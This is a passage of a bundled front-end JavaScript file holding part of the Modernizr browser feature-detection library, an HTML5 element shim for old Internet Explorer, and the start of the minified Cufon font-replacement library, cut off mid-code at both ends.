        return test_props_all( 'columnCount' );
    };
    
    
    tests['cssgradients'] = function() {
        /**
         * For CSS Gradients syntax, please see:
         * http://webkit.org/blog/175/introducing-css-gradients/
         * https://developer.mozilla.org/en/CSS/-moz-linear-gradient
         * https://developer.mozilla.org/en/CSS/-moz-radial-gradient
         * http://dev.w3.org/csswg/css3-images/#gradients-
         */
        
        var str1 = 'background-image:',
            str2 = 'gradient(linear,left top,right bottom,from(#9f9),to(white));',
            str3 = 'linear-gradient(left top,#9f9, white);';
        
        set_css(
            (str1 + prefixes.join(str2 + str1) + prefixes.join(str3 + str1)).slice(0,-str1.length)
        );
        
        return contains( m_style.backgroundImage, 'gradient' );
    };
    
    
    tests['cssreflections'] = function() {
        return test_props_all( 'boxReflect' );
    };
    
    
    tests['csstransforms'] = function() {
        return !!test_props([ 'transformProperty', 'WebkitTransform', 'MozTransform', 'OTransform', 'msTransform' ]);
    };
    
    
    tests['csstransforms3d'] = function() {
        
        var ret = !!test_props([ 'perspectiveProperty', 'WebkitPerspective', 'MozPerspective', 'OPerspective', 'msPerspective' ]);
        
        // WebkitÕs 3D transforms are passed off to the browser's own graphics renderer.
        //   It works fine in Safari on Leopard and Snow Leopard, but not in Chrome in
        //   some conditions. As a result, Webkit typically recognizes the syntax but 
        //   will sometimes throw a false positive, thus we must do a more thorough check:
        if (ret && 'webkitPerspective' in docElement.style){
          
          // Webkit allows this media query to succeed only if the feature is enabled.    
          // `@media (transform-3d),(-o-transform-3d),(-moz-transform-3d),(-ms-transform-3d),(-webkit-transform-3d),(modernizr){ ... }`    
          ret = testMediaQuery('@media ('+prefixes.join('transform-3d),(')+'modernizr)');
        }
        return ret;
    };
    
    
    tests['csstransitions'] = function() {
        return test_props_all( 'transitionProperty' );
    };


    // @font-face detection routine by Diego Perini
    // http://javascript.nwbox.com/CSSSupport/
    tests['fontface'] = function(){

        var 
        sheet, bool,
        head = docHead || docElement,
        style = document.createElement("style"),
        impl = document.implementation || { hasFeature: function() { return false; } };
        
        style.type = 'text/css';
        head.insertBefore(style, head.firstChild);
        sheet = style.sheet || style.styleSheet;

        var supportAtRule = impl.hasFeature('CSS2', '') ?
                function(rule) {
                    if (!(sheet && rule)) return false;
                    var result = false;
                    try {
                        sheet.insertRule(rule, 0);
                        result = (/src/i).test(sheet.cssRules[0].cssText);
                        sheet.deleteRule(sheet.cssRules.length - 1);
                    } catch(e) { }
                    return result;
                } :
                function(rule) {
                    if (!(sheet && rule)) return false;
                    sheet.cssText = rule;
                    
                    return sheet.cssText.length !== 0 && (/src/i).test(sheet.cssText) &&
                      sheet.cssText
                            .replace(/\r+|\n+/g, '')
                            .indexOf(rule.split(' ')[0]) === 0;
                };
        
        bool = supportAtRule('@font-face { font-family: "font"; src: url(data:,); }');
        head.removeChild(style);
        return bool;
    };
    

    // These tests evaluate support of the video/audio elements, as well as
    // testing what types of content they support.
    //
    // We're using the Boolean constructor here, so that we can extend the value
    // e.g.  Modernizr.video     // true
    //       Modernizr.video.ogg // 'probably'
    //
    // Codec values from : http://github.com/NielsLeenheer/html5test/blob/9106a8/index.html#L845
    //                     thx to NielsLeenheer and zcorpan
    
    // Note: in FF 3.5.1 and 3.5.0, "no" was a return value instead of empty string.
    //   Modernizr does not normalize for that.
    
    tests['video'] = function() {
        var elem = document.createElement('video'),
            bool = !!elem.canPlayType;
        
        if (bool){  
            bool      = new Boolean(bool);  
            bool.ogg  = elem.canPlayType('video/ogg; codecs="theora"');
            
            // Workaround required for IE9, which doesn't report video support without audio codec specified.
            //   bug 599718 @ msft connect
            var h264 = 'video/mp4; codecs="avc1.42E01E';
            bool.h264 = elem.canPlayType(h264 + '"') || elem.canPlayType(h264 + ', mp4a.40.2"');
            
            bool.webm = elem.canPlayType('video/webm; codecs="vp8, vorbis"');
        }
        return bool;
    };
    
    tests['audio'] = function() {
        var elem = document.createElement('audio'),
            bool = !!elem.canPlayType;
        
        if (bool){  
            bool      = new Boolean(bool);  
            bool.ogg  = elem.canPlayType('audio/ogg; codecs="vorbis"');
            bool.mp3  = elem.canPlayType('audio/mpeg;');
            
            // Mimetypes accepted: 
            //   https://developer.mozilla.org/En/Media_formats_supported_by_the_audio_and_video_elements
            //   http://bit.ly/iphoneoscodecs
            bool.wav  = elem.canPlayType('audio/wav; codecs="1"');
            bool.m4a  = elem.canPlayType('audio/x-m4a;') || elem.canPlayType('audio/aac;');
        }
        return bool;
    };


    // Firefox has made these tests rather unfun.

    // In FF4, if disabled, window.localStorage should === null.

    // Normally, we could not test that directly and need to do a 
    //   `('localStorage' in window) && ` test first because otherwise Firefox will
    //   throw http://bugzil.la/365772 if cookies are disabled

    // However, in Firefox 4 betas, if dom.storage.enabled == false, just mentioning
    //   the property will throw an exception. http://bugzil.la/599479
    // This looks to be fixed for FF4 Final.

    // Because we are forced to try/catch this, we'll go aggressive.

    // FWIW: IE8 Compat mode supports these features completely:
    //   http://www.quirksmode.org/dom/html5.html
    // But IE8 doesn't support either with local files

    tests['localstorage'] = function() {
        try {
            return !!localStorage.getItem;
        } catch(e) {
            return false;
        }
    };

    tests['sessionstorage'] = function() {
        try {
            return !!sessionStorage.getItem;
        } catch(e){
            return false;
        }
    };


    tests['webWorkers'] = function () {
        return !!window.Worker;
    };


    tests['applicationcache'] =  function() {
        return !!window.applicationCache;
    };

 
    // Thanks to Erik Dahlstrom
    tests['svg'] = function(){
        return !!document.createElementNS && !!document.createElementNS(ns.svg, "svg").createSVGRect;
    };

    tests['inlinesvg'] = function() {
      var div = document.createElement('div');
      div.innerHTML = '<svg/>';
      return (div.firstChild && div.firstChild.namespaceURI) == ns.svg;
    };

    // Thanks to F1lt3r and lucideer
    // http://github.com/Modernizr/Modernizr/issues#issue/35
    tests['smil'] = function(){
        return !!document.createElementNS && /SVG/.test(tostring.call(document.createElementNS(ns.svg,'animate')));
    };

    tests['svgclippaths'] = function(){
        // Possibly returns a false positive in Safari 3.2?
        return !!document.createElementNS && /SVG/.test(tostring.call(document.createElementNS(ns.svg,'clipPath')));
    };


    // input features and input types go directly onto the ret object, bypassing the tests loop.
    // Hold this guy to execute in a moment.
    function webforms(){
    
        // Run through HTML5's new input attributes to see if the UA understands any.
        // We're using f which is the <input> element created early on
        // Mike Taylr has created a comprehensive resource for testing these attributes
        //   when applied to all input types: 
        //   http://miketaylr.com/code/input-type-attr.html
        // spec: http://www.whatwg.org/specs/web-apps/current-work/multipage/the-input-element.html#input-type-attr-summary
        ret['input'] = (function(props) {
            for (var i = 0, len = props.length; i<len; i++) {
                attrs[ props[i] ] = !!(props[i] in inputElem);
            }
            return attrs;
        })('autocomplete autofocus list placeholder max min multiple pattern required step'.split(' '));

        // Run through HTML5's new input types to see if the UA understands any.
        //   This is put behind the tests runloop because it doesn't return a
        //   true/false like all the other tests; instead, it returns an object
        //   containing each input type with its corresponding true/false value 
        
        // Big thanks to @miketaylr for the html5 forms expertise. http://miketaylr.com/
        ret['inputtypes'] = (function(props) {
          
            for (var i = 0, bool, inputElemType, defaultView, len=props.length; i < len; i++) {
              
                inputElem.setAttribute('type', inputElemType = props[i]);
                bool = inputElem.type !== 'text';
                
                // We first check to see if the type we give it sticks.. 
                // If the type does, we feed it a textual value, which shouldn't be valid.
                // If the value doesn't stick, we know there's input sanitization which infers a custom UI
                if (bool){  
                  
                    inputElem.value         = smile;
                    inputElem.style.cssText = 'position:absolute;visibility:hidden;';
     
                    if (/^range$/.test(inputElemType) && inputElem.style.WebkitAppearance !== undefined){
                      
                      docElement.appendChild(inputElem);
                      defaultView = document.defaultView;
                      
                      // Safari 2-4 allows the smiley as a value, despite making a slider
                      bool =  defaultView.getComputedStyle && 
                              defaultView.getComputedStyle(inputElem, null).WebkitAppearance !== 'textfield' &&                  
                              // Mobile android web browser has false positive, so must
                              // check the height to see if the widget is actually there.
                              (inputElem.offsetHeight !== 0);
                              
                      docElement.removeChild(inputElem);
                              
                    } else if (/^(search|tel)$/.test(inputElemType)){
                      // Spec doesnt define any special parsing or detectable UI 
                      //   behaviors so we pass these through as true
                      
                      // Interestingly, opera fails the earlier test, so it doesn't
                      //  even make it here.
                      
                    } else if (/^(url|email)$/.test(inputElemType)) {
                      // Real url and email support comes with prebaked validation.
                      bool = inputElem.checkValidity && inputElem.checkValidity() === false;
                      
                    } else if (/^color$/.test(inputElemType)) {
                        // chuck into DOM and force reflow for Opera bug in 11.00
                        // github.com/Modernizr/Modernizr/issues#issue/159
                        docElement.appendChild(inputElem);
                        docElement.offsetWidth; 
                        bool = inputElem.value != smile;
                        docElement.removeChild(inputElem);

                    } else {
                      // If the upgraded input compontent rejects the :) text, we got a winner
                      bool = inputElem.value != smile;
                    }
                }
                
                inputs[ props[i] ] = !!bool;
            }
            return inputs;
        })('search tel url email datetime date month week time datetime-local number range color'.split(' '));

    }



    // End of test definitions
    // -----------------------



    // Run through all tests and detect their support in the current UA.
    // todo: hypothetically we could be doing an array of tests and use a basic loop here.
    for ( var feature in tests ) {
        if ( hasOwnProperty( tests, feature ) ) {
            // run the test, throw the return value into the Modernizr,
            //   then based on that boolean, define an appropriate className
            //   and push it into an array of classes we'll join later.
            featurename  = feature.toLowerCase();
            ret[ featurename ] = tests[ feature ]();

            classes.push( ( ret[ featurename ] ? '' : 'no-' ) + featurename );
        }
    }
    
    // input tests need to run.
    if (!ret.input) webforms();
    

   
    // Per 1.6: deprecated API is still accesible for now:
    ret.crosswindowmessaging = ret.postmessage;
    ret.historymanagement = ret.history;



    /**
     * Addtest allows the user to define their own feature tests
     * the result will be added onto the Modernizr object,
     * as well as an appropriate className set on the html element
     * 
     * @param feature - String naming the feature
     * @param test - Function returning true if feature is supported, false if not
     */
    ret.addTest = function (feature, test) {
      feature = feature.toLowerCase();
      
      if (ret[ feature ]) {
        return; // quit if you're trying to overwrite an existing test
      } 
      test = !!(test());
      docElement.className += ' ' + (test ? '' : 'no-') + feature; 
      ret[ feature ] = test;
      return ret; // allow chaining.
    };

    /**
     * Reset m.style.cssText to nothing to reduce memory footprint.
     */
    set_css( '' );
    modElem = inputElem = null;

    //>>BEGIN IEPP
    // Enable HTML 5 elements for styling in IE. 
    // fyi: jscript version does not reflect trident version
    //      therefore ie9 in ie7 mode will still have a jScript v.9
    if ( enableHTML5 && window.attachEvent && (function(){ var elem = document.createElement("div");
                                      elem.innerHTML = "<elem></elem>";
                                      return elem.childNodes.length !== 1; })()) {
        // iepp v1.6.2 by @jon_neal : code.google.com/p/ie-print-protector
        (function(win, doc) {
          var elems = 'abbr|article|aside|audio|canvas|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video',
            elemsArr = elems.split('|'),
            elemsArrLen = elemsArr.length,
            elemRegExp = new RegExp('(^|\\s)('+elems+')', 'gi'), 
            tagRegExp = new RegExp('<(\/*)('+elems+')', 'gi'),
            ruleRegExp = new RegExp('(^|[^\\n]*?\\s)('+elems+')([^\\n]*)({[\\n\\w\\W]*?})', 'gi'),
            docFrag = doc.createDocumentFragment(),
            html = doc.documentElement,
            head = html.firstChild,
            bodyElem = doc.createElement('body'),
            styleElem = doc.createElement('style'),
            body;
          function shim(doc) {
            var a = -1;
            while (++a < elemsArrLen)
              // Use createElement so IE allows HTML5-named elements in a document
              doc.createElement(elemsArr[a]);
          }
          function getCSS(styleSheetList, mediaType) {
            var a = -1,
              len = styleSheetList.length,
              styleSheet,
              cssTextArr = [];
            while (++a < len) {
              styleSheet = styleSheetList[a];
              // Get css from all non-screen stylesheets and their imports
              if ((mediaType = styleSheet.media || mediaType) != 'screen') cssTextArr.push(getCSS(styleSheet.imports, mediaType), styleSheet.cssText);
            }
            return cssTextArr.join('');
          }
          // Shim the document and iepp fragment
          shim(doc);
          shim(docFrag);
          // Add iepp custom print style element
          head.insertBefore(styleElem, head.firstChild);
          styleElem.media = 'print';
          win.attachEvent(
            'onbeforeprint',
            function() {
              var a = -1,
                cssText = getCSS(doc.styleSheets, 'all'),
                cssTextArr = [],
                rule;
              body = body || doc.body;
              // Get only rules which reference HTML5 elements by name
              while ((rule = ruleRegExp.exec(cssText)) != null)
                // Replace all html5 element references with iepp substitute classnames
                cssTextArr.push((rule[1]+rule[2]+rule[3]).replace(elemRegExp, '$1.iepp_$2')+rule[4]);
              // Write iepp custom print CSS
              styleElem.styleSheet.cssText = cssTextArr.join('\n');
              while (++a < elemsArrLen) {
                var nodeList = doc.getElementsByTagName(elemsArr[a]),
                  nodeListLen = nodeList.length,
                  b = -1;
                while (++b < nodeListLen)
                  if (nodeList[b].className.indexOf('iepp_') < 0)
                    // Append iepp substitute classnames to all html5 elements
                    nodeList[b].className += ' iepp_'+elemsArr[a];
              }
              docFrag.appendChild(body);
              html.appendChild(bodyElem);
              // Write iepp substitute print-safe document
              bodyElem.className = body.className;
              // Replace HTML5 elements with <font> which is print-safe and shouldn't conflict since it isn't part of html5
              bodyElem.innerHTML = body.innerHTML.replace(tagRegExp, '<$1font');
            }
          );
          win.attachEvent(
            'onafterprint',
            function() {
              // Undo everything done in onbeforeprint
              bodyElem.innerHTML = '';
              html.removeChild(bodyElem);
              html.appendChild(body);
              styleElem.styleSheet.cssText = '';
            }
          );
        })(window, document);
    }
    //>>END IEPP

    // Assign private properties to the return object with prefix
    ret._enableHTML5     = enableHTML5;
    ret._version         = version;

    // Remove "no-js" class from <html> element, if it exists:
    docElement.className = docElement.className.replace(/\bno-js\b/,'') 
                            + ' js '

                            // Add the new classes to the <html> element.
                            + classes.join( ' ' );
    
    return ret;

})(this,this.document);
(function(){
var html5elmeents = "address|article|aside|audio|canvas|command|datalist|details|dialog|figure|figcaption|footer|header|hgroup|keygen|mark|meter|menu|nav|progress|ruby|section|time|video".split('|');
for(var i = 0; i < html5elmeents.length; i++){
document.createElement(html5elmeents[i]);
}
}
)();
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var 